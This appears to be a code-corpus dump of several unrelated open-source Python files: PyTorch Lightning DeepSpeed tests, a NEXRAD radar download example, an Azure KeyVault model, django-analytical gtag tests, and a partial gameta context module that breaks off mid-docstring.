            current_deepspeed_plugin = trainer.accelerator.training_type_plugin
            assert isinstance(original_deepspeed_plugin, DeepSpeedPlugin)
            assert isinstance(current_deepspeed_plugin, DeepSpeedPlugin)
            # assert optimizer states are the correctly loaded
            original_optimizer_dict = original_deepspeed_plugin.deepspeed_engine.optimizer.state_dict()
            current_optimizer_dict = current_deepspeed_plugin.deepspeed_engine.optimizer.state_dict()
            for orig_tensor, current_tensor in zip(
                original_optimizer_dict["fp32_flat_groups"], current_optimizer_dict["fp32_flat_groups"]
            ):
                assert torch.all(orig_tensor.eq(current_tensor))
            # assert model state is loaded correctly
            for current_param, initial_param in zip(pl_module.parameters(), initial_model.parameters()):
                assert torch.equal(current_param.cpu(), initial_param.cpu())
            # assert epoch has correctly been restored
            assert trainer.current_epoch == 1
    model = ModelParallelClassificationModel()
    trainer = Trainer(
        default_root_dir=tmpdir,
        fast_dev_run=True,
        plugins=DeepSpeedPlugin(stage=3),
        gpus=1,
        precision=16,
        resume_from_checkpoint=ck.best_model_path,
        callbacks=TestCallback(),
    )
    trainer.fit(model, datamodule=dm)
@RunIf(min_gpus=2, deepspeed=True, special=True)
def test_deepspeed_multigpu_stage_3_checkpointing_full_weights_manual(tmpdir):
    """Test to ensure with Stage 3 and multiple GPUs that we can save/load a model resuming from a checkpoint,
    where we save the full weights to one file."""
    # manual optimization variant with no gradient accumulation
    run_checkpoint_test(tmpdir, automatic_optimization=False, accumulate_grad_batches=1)
@RunIf(min_gpus=2, deepspeed=True, special=True)
def test_deepspeed_multigpu_stage_2_accumulated_grad_batches(tmpdir):
    # Stage 2 gradient accumulation with the optimizer kept on GPU
    _deepspeed_multigpu_stage_2_accumulated_grad_batches(tmpdir, offload_optimizer=False)
@RunIf(min_gpus=2, deepspeed=True, special=True)
def test_deepspeed_multigpu_stage_2_accumulated_grad_batches_offload_optimizer(tmpdir):
    # Stage 2 gradient accumulation with the optimizer offloaded to CPU
    _deepspeed_multigpu_stage_2_accumulated_grad_batches(tmpdir, offload_optimizer=True)
def _deepspeed_multigpu_stage_2_accumulated_grad_batches(tmpdir, offload_optimizer):
    """Test to ensure with Stage 2 and multiple GPUs, accumulated grad batches works."""
    seed_everything(42)
    class VerificationCallback(Callback):
        def __init__(self):
            # flipped once the per-batch assertion has actually run
            self.on_train_batch_start_called = False
        def on_train_batch_start(self, trainer, pl_module: LightningModule, batch: Any, batch_idx: int) -> None:
            deepspeed_engine = trainer.training_type_plugin.model
            # Lightning's notion of global step must stay in sync with DeepSpeed's
            assert trainer.global_step == deepspeed_engine.global_steps
            self.on_train_batch_start_called = True
    model = ModelParallelClassificationModel()
    dm = ClassifDataModule()
    verification_callback = VerificationCallback()
    trainer = Trainer(
        default_root_dir=tmpdir,
        enable_progress_bar=False,
        # TODO: this test fails with max_epochs >1 as there are leftover batches per epoch.
        # there's divergence in how Lightning handles the last batch of the epoch with how DeepSpeed does it.
        # we step the optimizers on the last batch but DeepSpeed keeps the accumulation for the next epoch
        max_epochs=1,
        plugins=[DeepSpeedPlugin(stage=2, offload_optimizer=offload_optimizer)],
        gpus=2,
        limit_train_batches=5,
        limit_val_batches=2,
        precision=16,
        accumulate_grad_batches=2,
        callbacks=[verification_callback],
    )
    # 5 % 2 != 0 ensures the leftover-batch edge case is actually hit
    assert trainer.limit_train_batches % trainer.accumulate_grad_batches != 0, "leftover batches should be tested"
    trainer.fit(model, datamodule=dm)
    assert verification_callback.on_train_batch_start_called
@RunIf(min_gpus=2, deepspeed=True, special=True)
def test_deepspeed_multigpu_test(tmpdir):
    """Test to ensure we can use DeepSpeed with just test using ZeRO Stage 3."""
    trainer = Trainer(
        default_root_dir=tmpdir,
        plugins=[DeepSpeedPlugin(stage=3)],
        gpus=2,
        fast_dev_run=True,
        precision=16,
    )
    # call test() directly, without a prior fit()
    trainer.test(ModelParallelBoringModel())
@RunIf(min_gpus=1, deepspeed=True, special=True)
def test_deepspeed_multigpu_partial_partition_parameters(tmpdir):
    """Test to ensure that a module that defines a layer inside the ``__init__`` and ``configure_sharded_model``
    correctly converts all parameters to float16 when ``precision=16`` and runs successfully."""
    class TestModel(ModelParallelBoringModel):
        def __init__(self):
            super().__init__()
            # built eagerly, unlike ``layer`` which is created in configure_sharded_model
            self.layer_2 = torch.nn.Linear(32, 32)
        def configure_sharded_model(self) -> None:
            self.layer = torch.nn.Linear(32, 2)
        def forward(self, x):
            x = self.layer_2(x)
            return self.layer(x)
        def on_train_epoch_start(self) -> None:
            # generator expression: avoids materializing an intermediate list inside all()
            assert all(p.dtype == torch.float16 for p in self.parameters())
    model = TestModel()
    trainer = Trainer(
        default_root_dir=tmpdir, plugins=[DeepSpeedPlugin(stage=3)], gpus=1, fast_dev_run=True, precision=16
    )
    trainer.fit(model)
@RunIf(min_gpus=1, deepspeed=True, special=True)
def test_deepspeed_multigpu_test_rnn(tmpdir):
    """Test to ensure that turning off explicit partitioning of the entire module for ZeRO Stage 3 works when
    training with certain layers which will crash with explicit partitioning."""
    class TestModel(BoringModel):
        def __init__(self):
            super().__init__()
            # GRU layers are known to crash under explicit Stage 3 partitioning
            self.rnn = torch.nn.GRU(32, 32)
        def on_train_epoch_start(self) -> None:
            # generator expression: avoids materializing an intermediate list inside all()
            assert all(p.dtype == torch.float16 for p in self.parameters())
    model = TestModel()
    trainer = Trainer(
        default_root_dir=tmpdir,
        plugins=[DeepSpeedPlugin(stage=3, partition_module=False)],
        gpus=1,
        fast_dev_run=True,
        precision=16,
    )
    trainer.fit(model)
@RunIf(deepspeed=True)
@mock.patch("deepspeed.init_distributed", autospec=True)
@pytest.mark.parametrize("platform", ["Linux", "Windows"])
def test_deepspeed_plugin_env_variables(mock_deepspeed_distributed, tmpdir, platform):
    """Test to ensure that we setup distributed communication using correctly.
    When using windows, ranks environment variables should not be set, and deepspeed should handle this.
    """
    trainer = Trainer(default_root_dir=tmpdir, plugins=[DeepSpeedPlugin(stage=3)])
    plugin = trainer.training_type_plugin
    assert isinstance(plugin, DeepSpeedPlugin)
    # fake the OS so the same code path can be checked for both platforms
    with mock.patch("platform.system", return_value=platform) as mock_platform:
        plugin._init_deepspeed_distributed()
    mock_deepspeed_distributed.assert_called()
    mock_platform.assert_called()
    if platform == "Windows":
        # assert no env variables have been set within the DeepSpeedPlugin
        assert all(k not in os.environ for k in ("MASTER_PORT", "MASTER_ADDR", "RANK", "WORLD_SIZE", "LOCAL_RANK"))
    else:
        # on Linux the plugin exports the rendezvous/rank variables itself
        assert os.environ["MASTER_ADDR"] == str(trainer.training_type_plugin.cluster_environment.master_address())
        assert os.environ["MASTER_PORT"] == str(trainer.training_type_plugin.cluster_environment.master_port())
        assert os.environ["RANK"] == str(trainer.training_type_plugin.global_rank)
        assert os.environ["WORLD_SIZE"] == str(trainer.training_type_plugin.world_size)
        assert os.environ["LOCAL_RANK"] == str(trainer.training_type_plugin.local_rank)
def _assert_save_model_is_equal(model, tmpdir, trainer):
    """Save a (possibly sharded) checkpoint, convert it to a single fp32 state dict and
    assert the weights match the in-memory model. The comparison runs on rank 0 only."""
    checkpoint_path = os.path.join(tmpdir, "model.pt")
    # broadcast so every rank saves to the same path
    checkpoint_path = trainer.training_type_plugin.broadcast(checkpoint_path)
    trainer.save_checkpoint(checkpoint_path)
    trainer.training_type_plugin.barrier()
    # carry out the check only on rank 0
    if trainer.is_global_zero:
        single_ckpt_path = os.path.join(tmpdir, "single_model.pt")
        convert_zero_checkpoint_to_fp32_state_dict(checkpoint_path, single_ckpt_path)
        state_dict = torch.load(single_ckpt_path)
        model = model.cpu()
        # Assert model parameters are identical after loading
        for orig_param, saved_model_param in zip(model.parameters(), state_dict.values()):
            if model.dtype == torch.half:
                # checkpoint was consolidated to fp32; cast it back to half to
                # compare against the fp16 in-memory model
                saved_model_param = saved_model_param.half()
            assert torch.equal(orig_param, saved_model_param)
@RunIf(min_gpus=2, deepspeed=True, special=True)
def test_deepspeed_multigpu_no_schedulers(tmpdir):
    """Test to ensure ZeRO Stage 3 works with a parallel model and no schedulers."""
    model = ModelParallelBoringModelNoSchedulers()
    trainer = Trainer(
        default_root_dir=tmpdir,
        plugins=[DeepSpeedPlugin(stage=3)],
        gpus=2,
        fast_dev_run=True,
        precision=16,
    )
    trainer.fit(model)
    # saved checkpoint must round-trip to the same weights
    _assert_save_model_is_equal(model, tmpdir, trainer)
@RunIf(min_gpus=1, deepspeed=True, special=True)
def test_deepspeed_skip_backward_raises(tmpdir):
    # Returning None from training_step (which normally skips the step) is not
    # supported under DeepSpeed and must raise a MisconfigurationException.
    class TestModel(BoringModel):
        def training_step(self, batch, batch_idx):
            return None
    model = TestModel()
    trainer = Trainer(default_root_dir=tmpdir, plugins=[DeepSpeedPlugin()], gpus=1, fast_dev_run=True, precision=16)
    with pytest.raises(MisconfigurationException, match="returning `None` .* is not supported"):
        trainer.fit(model)
@RunIf(min_gpus=1, deepspeed=True, special=True)
def test_deepspeed_warn_train_dataloader_called(tmpdir):
    """Test DeepSpeed warns when it calls ``lightning_module.train_dataloader`` internally for logging batch
    size."""
    trainer = Trainer(
        default_root_dir=tmpdir,
        plugins=[DeepSpeedPlugin()],
        gpus=1,
        fast_dev_run=True,
    )
    with pytest.warns(UserWarning, match="Inferring the batch size for internal deepspeed logging"):
        trainer.fit(BoringModel())
@RunIf(min_gpus=1, deepspeed=True, special=True)
def test_deepspeed_setup_train_dataloader(tmpdir):
    """Test DeepSpeed works when setup is required to call, and the user passes the batch size manually."""
    class TestSetupIsCalledDataModule(LightningDataModule):
        def __init__(self):
            super().__init__()
            # tracks whether setup() ran before any dataloader was requested
            self._setup = False
        def setup(self, stage: Optional[str] = None) -> None:
            self._setup = True
        def train_dataloader(self):
            assert self._setup
            return DataLoader(RandomDataset(32, 64), batch_size=2)
        def val_dataloader(self):
            assert self._setup
            return DataLoader(RandomDataset(32, 64), batch_size=2)
        def test_dataloader(self):
            assert self._setup
            return DataLoader(RandomDataset(32, 64), batch_size=2)
    model = BoringModel()
    # logging_batch_size_per_gpu is given explicitly, so DeepSpeed never needs to
    # inspect the dataloaders before setup() has been called
    trainer = Trainer(
        default_root_dir=tmpdir,
        plugins=[DeepSpeedPlugin(logging_batch_size_per_gpu=32)],
        gpus=1,
        fast_dev_run=True,
    )
    trainer.fit(model, datamodule=TestSetupIsCalledDataModule())
    trainer.test(model)
@mock.patch("torch.optim.lr_scheduler.StepLR.step", autospec=True)
@RunIf(min_gpus=1, deepspeed=True, special=True)
def test_deepspeed_scheduler_step_count(mock_step):
    """Test to ensure that the scheduler is called the correct amount of times during training when scheduler is
    set to step."""
    # per-step interval: expect one scheduler step for every training batch
    _run_scheduler_test(mock_step, max_epoch=2, limit_train_batches=2, interval="step")
@mock.patch("torch.optim.lr_scheduler.StepLR.step", autospec=True)
@RunIf(min_gpus=1, deepspeed=True, special=True)
def test_deepspeed_scheduler_step_count_epoch(mock_step):
    """Test to ensure that the scheduler is called the correct amount of times during training when scheduler is
    set to epoch."""
    # per-epoch interval: expect one scheduler step per epoch
    _run_scheduler_test(mock_step, max_epoch=2, limit_train_batches=2, interval="epoch")
def _run_scheduler_test(mock_step, max_epoch, limit_train_batches, interval):
    """Train a StepLR model under DeepSpeed and assert how many times the (mocked)
    scheduler ``step`` was invoked for the given interval setting."""
    class TestModel(BoringModel):
        def configure_optimizers(self):
            optimizer = torch.optim.SGD(self.layer.parameters(), lr=0.1)
            scheduler = torch.optim.lr_scheduler.StepLR(optimizer, 1, gamma=0.1)
            return {
                "optimizer": optimizer,
                "lr_scheduler": {"scheduler": scheduler, "interval": interval},
            }
    model = TestModel()
    # NOTE(review): uses os.getcwd() rather than a tmpdir — presumably intentional
    # for the `special` test runner, but verify this doesn't pollute the repo root
    trainer = Trainer(
        default_root_dir=os.getcwd(),
        limit_train_batches=limit_train_batches,
        limit_val_batches=0,
        max_epochs=max_epoch,
        gpus=1,
        plugins="deepspeed",
    )
    trainer.fit(model)
    if interval == "epoch":
        # assert called once at init and once during training
        assert mock_step.call_count == 1 + max_epoch
    else:
        # assert called once at init and once during training
        assert mock_step.call_count == 1 + (max_epoch * limit_train_batches)
@RunIf(min_gpus=1, deepspeed=True, special=True)
def test_deepspeed_configure_gradient_clipping(tmpdir):
    """Test to ensure that a warning is raised when `LightningModule.configure_gradient_clipping` is overridden in
    case of deepspeed."""
    class TestModel(BoringModel):
        # user-level clipping hook; DeepSpeed clips internally so this should warn
        def configure_gradient_clipping(self, optimizer, optimizer_idx, gradient_clip_val, gradient_clip_algorithm):
            if optimizer_idx == 0:
                self.clip_gradients(optimizer, gradient_clip_val, gradient_clip_algorithm)
    model = TestModel()
    trainer = Trainer(
        default_root_dir=tmpdir,
        gpus=1,
        plugins="deepspeed",
        fast_dev_run=True,
    )
    with pytest.warns(UserWarning, match="handles gradient clipping internally"):
        trainer.fit(model)
@RunIf(min_gpus=1, deepspeed=True, special=True)
def test_deepspeed_gradient_clip_by_value(tmpdir):
    """Test to ensure that an exception is raised when using `gradient_clip_algorithm='value'`."""
    trainer = Trainer(
        default_root_dir=tmpdir,
        gpus=1,
        plugins="deepspeed",
        gradient_clip_algorithm="value",
    )
    # DeepSpeed only supports clipping by norm
    with pytest.raises(MisconfigurationException, match="does not support clipping gradients by value"):
        trainer.fit(BoringModel())
@RunIf(min_gpus=1, deepspeed=True, special=True)
def test_different_accumulate_grad_batches_fails(tmpdir):
    """A scheduled (dict) accumulate_grad_batches is unsupported by DeepSpeed and must raise."""
    trainer = Trainer(default_root_dir=tmpdir, accumulate_grad_batches={1: 2}, gpus=1, plugins="deepspeed")
    match = "DeepSpeed currently does not support different `accumulate_grad_batches`"
    with pytest.raises(MisconfigurationException, match=match):
        trainer.fit(BoringModel())
@RunIf(min_gpus=2, deepspeed=True, special=True)
def test_specific_gpu_device_id(tmpdir):
    # With gpus=[1], both the model and every batch must land on CUDA device index 1.
    class TestCallback(Callback):
        def on_train_start(self, trainer: Trainer, pl_module: LightningModule) -> None:
            assert model.device.index == 1
        def on_train_batch_start(
            self,
            trainer: Trainer,
            pl_module: LightningModule,
            batch: Any,
            batch_idx: int,
            dataloader_idx: int,
        ) -> None:
            assert batch.device.index == 1
        def on_test_start(self, trainer: Trainer, pl_module: LightningModule) -> None:
            assert model.device.index == 1
        def on_test_batch_start(
            self,
            trainer: Trainer,
            pl_module: LightningModule,
            batch: Any,
            batch_idx: int,
            dataloader_idx: int,
        ) -> None:
            assert batch.device.index == 1
    model = BoringModel()
    trainer = Trainer(
        default_root_dir=tmpdir, fast_dev_run=True, gpus=[1], plugins="deepspeed", callbacks=TestCallback()
    )
    trainer.fit(model)
    trainer.test(model)
| 38.966507 | 119 | 0.709062 |
b906bc2944db7a236c31ae9afc9c7dd21fcf60f9 | 300 | py | Python | examples/download.py | peterdhansen/nexradaws | 0658efc5ec95d113a9d87fed3feb71b35293bec4 | [
"MIT"
] | 28 | 2018-04-28T19:18:06.000Z | 2021-12-01T00:19:30.000Z | examples/download.py | peterdhansen/nexradaws | 0658efc5ec95d113a9d87fed3feb71b35293bec4 | [
"MIT"
] | 10 | 2017-06-30T19:33:20.000Z | 2021-07-27T22:39:52.000Z | examples/download.py | peterdhansen/nexradaws | 0658efc5ec95d113a9d87fed3feb71b35293bec4 | [
"MIT"
] | 7 | 2018-10-21T17:39:55.000Z | 2021-02-14T01:55:18.000Z | import nexradaws
# Example: download the first 12 available NEXRAD Level II scans for a station
# into a temporary directory (assumes `nexradaws` was imported above).
import tempfile
import six
# Scratch directory that receives the downloaded radar files.
templocation = tempfile.mkdtemp()
conn = nexradaws.NexradAwsInterface()
# List scans available on 2013-05-31 for station KTLX.
scans = conn.get_avail_scans('2013', '05', '31', 'KTLX')
localfiles = conn.download(scans[0:12],templocation)
# `download` returns a results object; report the successful downloads.
six.print_(localfiles.success)
six.print_(localfiles.success[0].filepath)
0361f75985c48303043c2b7bda78b13b9059c359 | 2,031 | py | Python | azure-keyvault/azure/keyvault/models/key_properties_py3.py | wawon-msft/azure-sdk-for-python | 8004d3ac11f4b5d7a43a955c79527d21ebd68850 | [
"MIT"
] | 1 | 2018-07-23T08:59:24.000Z | 2018-07-23T08:59:24.000Z | azure-keyvault/azure/keyvault/models/key_properties_py3.py | wawon-msft/azure-sdk-for-python | 8004d3ac11f4b5d7a43a955c79527d21ebd68850 | [
"MIT"
] | null | null | null | azure-keyvault/azure/keyvault/models/key_properties_py3.py | wawon-msft/azure-sdk-for-python | 8004d3ac11f4b5d7a43a955c79527d21ebd68850 | [
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class KeyProperties(Model):
"""Properties of the key pair backing a certificate.
:param exportable: Indicates if the private key can be exported.
:type exportable: bool
:param key_type: The type of key pair to be used for the certificate.
Possible values include: 'EC', 'EC-HSM', 'RSA', 'RSA-HSM', 'oct'
:type key_type: str or ~azure.keyvault.models.JsonWebKeyType
:param key_size: The key size in bits. For example: 2048, 3072, or 4096
for RSA.
:type key_size: int
:param reuse_key: Indicates if the same key pair will be used on
certificate renewal.
:type reuse_key: bool
:param curve: Elliptic curve name. For valid values, see
JsonWebKeyCurveName. Possible values include: 'P-256', 'P-384', 'P-521',
'P-256K'
:type curve: str or ~azure.keyvault.models.JsonWebKeyCurveName
"""
_attribute_map = {
'exportable': {'key': 'exportable', 'type': 'bool'},
'key_type': {'key': 'kty', 'type': 'str'},
'key_size': {'key': 'key_size', 'type': 'int'},
'reuse_key': {'key': 'reuse_key', 'type': 'bool'},
'curve': {'key': 'crv', 'type': 'str'},
}
def __init__(self, *, exportable: bool=None, key_type=None, key_size: int=None, reuse_key: bool=None, curve=None, **kwargs) -> None:
super(KeyProperties, self).__init__(**kwargs)
self.exportable = exportable
self.key_type = key_type
self.key_size = key_size
self.reuse_key = reuse_key
self.curve = curve
| 40.62 | 136 | 0.611521 |
1eebe8b1cee2a982e6a82539bc84ee3411c6f952 | 2,372 | py | Python | analytical/tests/test_tag_google_analytics_gtag.py | sean-wallace/django-analytical | 7e68563849c7cf6557e787b804d96a1b0617d4ef | [
"MIT"
] | null | null | null | analytical/tests/test_tag_google_analytics_gtag.py | sean-wallace/django-analytical | 7e68563849c7cf6557e787b804d96a1b0617d4ef | [
"MIT"
] | null | null | null | analytical/tests/test_tag_google_analytics_gtag.py | sean-wallace/django-analytical | 7e68563849c7cf6557e787b804d96a1b0617d4ef | [
"MIT"
] | null | null | null | """
Tests for the Google Analytics template tags and filters, using the new gtag.js library.
"""
from django.contrib.auth.models import User
from django.http import HttpRequest
from django.template import Context
from django.test.utils import override_settings
from analytical.templatetags.google_analytics_gtag import GoogleAnalyticsGTagNode
from analytical.tests.utils import TagTestCase
from analytical.utils import AnalyticalException
@override_settings(GOOGLE_ANALYTICS_GTAG_PROPERTY_ID='UA-123456-7')
class GoogleAnalyticsTagTestCase(TagTestCase):
    """
    Tests for the ``google_analytics_gtag`` template tag and node.
    """

    SCRIPT_TAG = '<script async src="https://www.googletagmanager.com/gtag/js?id=UA-123456-7"></script>'

    def _assert_gtag_snippet(self, rendered):
        # Assertions shared by the tag- and node-rendering tests.
        self.assertTrue(self.SCRIPT_TAG in rendered, rendered)
        self.assertTrue("gtag('js', new Date());" in rendered, rendered)
        self.assertTrue("gtag('config', 'UA-123456-7');" in rendered, rendered)

    def test_tag(self):
        rendered = self.render_tag('google_analytics_gtag', 'google_analytics_gtag')
        self._assert_gtag_snippet(rendered)

    def test_node(self):
        rendered = GoogleAnalyticsGTagNode().render(Context())
        self._assert_gtag_snippet(rendered)

    @override_settings(GOOGLE_ANALYTICS_GTAG_PROPERTY_ID=None)
    def test_no_property_id(self):
        self.assertRaises(AnalyticalException, GoogleAnalyticsGTagNode)

    @override_settings(GOOGLE_ANALYTICS_GTAG_PROPERTY_ID='wrong')
    def test_wrong_property_id(self):
        self.assertRaises(AnalyticalException, GoogleAnalyticsGTagNode)

    @override_settings(ANALYTICAL_INTERNAL_IPS=['1.1.1.1'])
    def test_render_internal_ip(self):
        request = HttpRequest()
        request.META['REMOTE_ADDR'] = '1.1.1.1'
        rendered = GoogleAnalyticsGTagNode().render(Context({'request': request}))
        self.assertTrue(rendered.startswith(
            '<!-- Google Analytics disabled on internal IP address'), rendered)
        self.assertTrue(rendered.endswith('-->'), rendered)

    @override_settings(ANALYTICAL_AUTO_IDENTIFY=True)
    def test_identify(self):
        rendered = GoogleAnalyticsGTagNode().render(Context({'user': User(username='test')}))
        self.assertTrue("gtag('set', {'user_id': 'test'});" in rendered, rendered)
4b0fdfdf5ebc0373b3fdaa7c04b3a86516f6af17 | 18,180 | py | Python | gameta/context.py | darkvariantdivine/gameta | 0cc2f4cf85974ef85569c456eab4c25c37be33ce | [
"MIT"
] | 6 | 2020-11-09T17:06:14.000Z | 2021-05-12T09:09:57.000Z | gameta/context.py | darkvariantdivine/gameta | 0cc2f4cf85974ef85569c456eab4c25c37be33ce | [
"MIT"
] | 33 | 2020-10-12T16:24:42.000Z | 2021-03-03T13:33:23.000Z | gameta/context.py | darkvariantdivine/gameta | 0cc2f4cf85974ef85569c456eab4c25c37be33ce | [
"MIT"
] | 4 | 2020-11-04T06:35:49.000Z | 2021-01-13T15:56:38.000Z | import json
import shlex
from abc import abstractmethod
from contextlib import contextmanager
from copy import deepcopy
from os import getenv, getcwd, chdir, environ
from os.path import join, basename, normpath, abspath
from typing import Optional, List, Generator, Dict, Tuple, Union
import click
from jsonschema.validators import Draft7Validator
__all__ = [
# Contexts
'GametaContext', 'gameta_context',
]
SHELL = getenv('SHELL', '/bin/sh')
class File(object):
"""
Generic file interface for Gameta file formats
Attributes:
context (GametaContext): Reference to Gameta Context
file_name (str): Name of the reference file
"""
def __init__(self, context: 'GametaContext', file_name: str):
self.context = context
self.file_name = file_name
@property
def file(self) -> str:
"""
Returns the absolute path to the reference file
Returns:
str: Absolute path to the file
"""
return join(self.context.project_dir, self.file_name)
@abstractmethod
def load(self) -> None:
"""
Abstractmethod to load data and validate data from the file and populate the GametaContext
Returns:
None
"""
@abstractmethod
def export(self) -> None:
"""
Abstractmethod to export data from the GametaContext to the file
Returns:
None
"""
class GitIgnore(File):
    """
    Interface for the .gitignore file

    Attributes:
        context (GametaContext): Reference to Gameta Context
        file_name (str): Reference to the .gitignore file
    """

    def __init__(self, context: 'GametaContext', file_name: str = '.gitignore'):
        super(GitIgnore, self).__init__(context, file_name)

    def load(self) -> None:
        """
        Reads the .gitignore file into the context's gitignore_data

        Returns:
            None
        """
        try:
            with open(self.file, 'r') as gitignore_file:
                self.context.gitignore_data = gitignore_file.readlines()
        except FileNotFoundError:
            # A missing .gitignore is not an error: leave the context untouched.
            return
        except Exception as e:
            # Any other failure clears the data and is reported to the user.
            self.context.gitignore_data = []
            click.echo(f"Could not load {self.file_name} file due to: {e.__class__.__name__}.{str(e)}")

    def export(self) -> None:
        """
        Writes the context's gitignore_data back to the .gitignore file

        Returns:
            None
        """
        try:
            with open(self.file, 'w') as gitignore_file:
                gitignore_file.writelines(self.context.gitignore_data)
        except Exception as e:
            click.echo(f"Could not export data to {self.file_name} file: {e.__class__.__name__}.{str(e)}")
class Meta(File):
    """
    Interface for the .meta file

    Attributes:
        context (GametaContext): Reference to Gameta Context
        file_name (str): Reference to the .meta file
    """

    def __init__(self, context: 'GametaContext', file_name: str = '.meta'):
        super(Meta, self).__init__(context, file_name)

    def load(self) -> None:
        """
        Loads data from the .meta file, validates it and populates the GametaContext

        Each section (repositories, commands, constants) is validated and
        loaded independently: a malformed section is reset to empty and
        reported, but does not prevent the other sections from loading.

        Returns:
            None
        """
        # Attempt to load .meta file
        # NOTE(review): this opens the relative `self.file_name` while export()
        # writes the absolute `self.file` — presumably relies on the cwd being
        # the project directory; confirm before changing.
        try:
            with open(self.file_name, 'r') as f:
                self.context.gameta_data = json.load(f)
        except FileNotFoundError:
            # No .meta file yet: the project has not been initialised.
            return
        except Exception as e:
            click.echo(f"Could not load {self.file_name} file due to: {e.__class__.__name__}.{str(e)}")

        # Validate repositories
        try:
            for repo in self.context.gameta_data['projects'].values():
                self.context.validators['repositories'].validate(repo)
            self.context.repositories = self.context.gameta_data['projects']
            # A valid 'projects' section marks this project as a metarepo.
            self.context.is_metarepo = True
            self.context.generate_tags()
        except Exception as e:
            self.context.repositories = {}
            self.context.tags = {}
            click.echo(f"Malformed repository element, error: {e.__class__.__name__}.{str(e)}")

        # Validate commands
        try:
            for command in self.context.gameta_data.get('commands', {}).values():
                self.context.validators['commands'].validate(command)
            self.context.commands = self.context.gameta_data.get('commands', {})
        except Exception as e:
            self.context.commands = {}
            click.echo(f"Malformed commands element, error: {e.__class__.__name__}.{str(e)}")

        # Validate constants
        try:
            self.context.validators['constants'].validate(self.context.gameta_data.get('constants', {}))
            self.context.constants = self.context.gameta_data.get('constants', {})
        except Exception as e:
            self.context.constants = {}
            click.echo(f"Malformed constants element, error: {e.__class__.__name__}.{str(e)}")

    def export(self) -> None:
        """
        Exports data from the GametaContext to the .meta file

        Empty commands/constants sections are omitted from the output file.

        Returns:
            None
        """
        try:
            self.context.gameta_data['projects'] = self.context.repositories
            if self.context.commands:
                self.context.gameta_data['commands'] = self.context.commands
            if self.context.constants:
                self.context.gameta_data['constants'] = self.context.constants
            with open(self.file, 'w') as f:
                json.dump(self.context.gameta_data, f, indent=2)
        except Exception as e:
            click.echo(f"Could not export data to {self.file_name} file: {e.__class__.__name__}.{str(e)}")
class GametaContext(object):
    """
    GametaContext for the current Gameta session

    Attributes:
        __schema__ (Dict): JSON Schema for Gameta .meta file
        validators (Dict[str, jsonschema.Draft7Validator]): JSON Schema validators for each object component
        reserved_params (Dict[str, List[str]): Reserved parameters for each object group
        project_dir (Optional[str]): Project directory
        is_metarepo (bool): Project is a metarepo
        gameta_data (Dict): Gameta data extracted and exported
        repositories (Dict[str, Dict]): Data of all the repositories contained in the metarepo
        tags (Dict[str, List[str]]): Repository data organised according to tags
        constants (Dict[str, Union[str, int, bool, float]]): Gameta constants data extracted
        commands (Dict): Gameta commands data extracted
        gitignore_data (List[str]): Gitignore data extracted from the .gitignore file
        env_vars (Dict): Extracted environment variables with keys prefixed with $
        files (Dict[str, File]): File formats supported
    """

    # Draft-7 JSON Schema describing the structure of the .meta file.
    # NOTE(review): the "required" key is nested inside "properties", where
    # JSON Schema treats it as a property named "required" rather than a
    # constraint — presumably intended at the object level; confirm.
    __schema__: Dict = {
        '$schema': "http://json-schema.org/draft-07/schema#",
        "type": "object",
        "properties": {
            "repositories": {
                "$ref": "#/definitions/repositories"
            },
            "commands": {
                "$ref": "#/definitions/commands"
            },
            "constants": {
                "$ref": "#/definitions/constants"
            },
            "required": [
                "repositories"
            ]
        },
        'definitions': {
            "repositories": {
                "type": "object",
                "properties": {
                    "url": {
                        "type": ["string", "null"],
                        "format": "uri"
                    },
                    "path": {
                        "type": "string"
                    },
                    "tags": {
                        "type": "array",
                        "items": {
                            "type": "string"
                        }
                    },
                    "__metarepo__": {
                        "type": "boolean"
                    }
                },
                "required": [
                    "url", "path", "__metarepo__"
                ]
            },
            "commands": {
                "type": "object",
                "properties": {
                    "commands": {
                        "type": "array",
                        "items": {
                            "type": "string"
                        },
                    },
                    "description": {
                        "type": "string"
                    },
                    "raise_errors": {
                        "type": "boolean"
                    },
                    "shell": {
                        "type": "boolean"
                    },
                    "python": {
                        "type": "boolean"
                    },
                    "verbose": {
                        "type": "boolean"
                    },
                    "repositories": {
                        "type": "array",
                        "items": {
                            "type": "string"
                        },
                    },
                    "tags": {
                        "type": "array",
                        "items": {
                            "type": "string"
                        },
                    }
                },
                "minProperties": 6,
                "maxProperties": 8,
                "additionalProperties": False,
            },
            "constants": {
                "type": "object",
                "propertyNames": {
                    "pattern": "^[$A-Z0-9_-]"
                }
            }
        }
    }

    # Pre-built validators for the whole schema and each sub-definition.
    validators = {
        'meta': Draft7Validator(__schema__),
        'repositories': Draft7Validator(__schema__['definitions']['repositories']),
        'commands': Draft7Validator(__schema__['definitions']['commands']),
        'constants': Draft7Validator(__schema__['definitions']['constants'])
    }

    # Parameter names reserved by the schema; user-defined parameters must not
    # collide with these.
    reserved_params: Dict[str, List[str]] = {
        'repositories': list(__schema__['definitions']['repositories']['properties'].keys()),
        'commands': list(__schema__['definitions']['commands']['properties'].keys())
    }

    def __init__(self):
        self.project_dir: Optional[str] = None
        self.gitignore_data: List[str] = []
        self.is_metarepo: bool = False
        self.gameta_data: Dict = {}
        self.constants: Dict[str, Union[str, int, bool, float]] = {}
        self.commands: Dict = {}
        self.repositories: Dict[str, Dict] = {}
        self.tags: Dict[str, List[str]] = {}
        # Snapshot of the environment at construction time, keyed as
        # "$NAME" so the keys substitute directly into command templates.
        self.env_vars: Dict = {
            '$' + k.upper(): v
            for k, v in environ.items()
        }
        # Supported file formats backing this context.
        self.files: Dict[str, File] = {
            'meta': Meta(self),
            'gitignore': GitIgnore(self)
        }

    @property
    def project_name(self) -> str:
        """
        Returns the name of the project

        Returns:
            str: Name of the project
        """
        return basename(self.project_dir)

    @property
    def meta(self) -> str:
        """
        Returns the path to the .meta file of the project, i.e. where it should be if the Project has not been
        initialised

        Returns:
            str: Path to the project's .meta file
        """
        return self.files['meta'].file

    @property
    def gitignore(self) -> str:
        """
        Returns the path to the .gitignore file of the project, i.e. where it should be if the Project has not been
        initialised

        Returns:
            str: Path to the project's .gitignore file
        """
        return self.files['gitignore'].file

    def add_gitignore(self, path: str) -> None:
        """
        Adds the path (as a directory entry, "path/") to the gitignore_data

        Args:
            path (str): Path to be added

        Returns:
